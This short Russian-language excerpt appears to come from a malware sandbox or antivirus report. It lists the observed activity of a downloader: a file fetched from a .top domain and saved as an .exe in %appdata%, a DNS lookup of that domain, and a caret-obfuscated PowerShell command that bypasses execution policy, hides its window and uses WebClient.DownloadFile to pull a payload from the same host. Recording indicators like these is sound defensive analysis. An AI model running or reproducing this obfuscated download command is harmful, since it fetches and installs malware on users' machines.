Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^oWeRs^hELl.eXE^ -^exeC^UtI^O^nP^Ol^IcY^ ^bypass -n^op^R^Ofi^Le -WIND^owstyle ^h^i^DdeN (n^Ew-^OB^jec^t ^S^YsteM.^nET.webc^l^ie^nT^)^.DOwNlOa^dFI^lE('http://footarepu.top/read.p...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /C "p^oWeRs^hELl.eXE^ -^exeC^UtI^O^nP^Ol^IcY^ ^bypass -n^op^R^Ofi^Le -WIND^owstyle ^h^i^DdeN (n^Ew-^OB^jec^t ^S^YsteM.^nET.webc^l^ie^nT^)^.DOwNlOa^dFI^lE('http://footarepu.top/read.p...' (со скрытым окном)